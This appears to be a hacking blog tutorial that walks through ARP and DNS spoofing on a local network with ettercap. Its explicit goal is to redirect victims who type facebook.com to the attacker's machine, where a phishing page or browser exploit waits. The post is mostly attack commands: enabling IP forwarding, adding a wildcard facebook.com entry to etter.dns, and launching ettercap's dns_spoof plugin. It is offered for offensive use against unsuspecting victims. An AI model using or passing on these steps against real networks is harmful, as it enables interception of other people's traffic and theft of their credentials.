Setup DNS Poisoning Attack In Local Network

What's up guys You people learn to make Phishing page with SET and to exploit Browser based vulnerabilities earlier. Now the main thing is that, why the victim enter my IP address in his or her browser. Yes you are right we have to make our victim to go to our IP address, and this is only possible with DNS poisoning. So lets start the work to Poisson our victims DNS, so that he or she get redirect to our PC after typing Facebook.com in his or her browser.

Type in the command to check the IP forwarding is enabled or not, if the file contains value 0 then it means forwarding is disabled and if the value is 1 then it is fine and move to step 3.
root@bt:~#more /proc/sys/net/ipv4/ip_forward



To enable IP forwarding give the following command in to the terminal.This will echo value 1 into the file.
root@bt:~#echo 1 > /proc/sys/net/ipv4/ip_forward
Then check again the value is changed to 1 or not with the same command as above.
root@bt:~#more /proc/sys/net/ipv4/ip_forward


To see what is your IP address, Open up new tab and give the command 
root@bt:~#ifconfig
Notice your IP address listed under the network adapter your are connected with, In my case it is under eth0 which is ethernet adapter.


Now type in the following command to locate the location of  etter.dns file.
root@bt:~#locate etter.dns
Copy the path of etter.dns file that is in the ettercap folder and open it with nano text editor like as below.
root@bt:~#nano /usr/local/share/ettercap/etter.dns



Now add the following lines at the end of etter.dns file to redirect Facebook.com request made by victim to attacker IP address.
*.facebook.com    A    192.168.1.101

Now press Ctrl key + x, then press y and then hit enter.

Now time for action, type the below written command as it is and hit enter.
root@bt:~#ettercap -T -q -M arp:remote -P dns_spoof //


Now sit back and wait for victim to open Facebook and that will redirect to our Backtrack machine, where we can set up Phishing attack by Social Engineering toolkit (SET)(Tutorial), or any other Browser based exploitation attack (Tutorial).
Hope this is bit informative for you, Thank you.



Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

1 comments

YOU TUBE CHANNEL

Powered by Blog - Widget
 
© 2011 StarHackx
Designed by Blog Thiet Ke
Posts RSSComments RSS
Back to top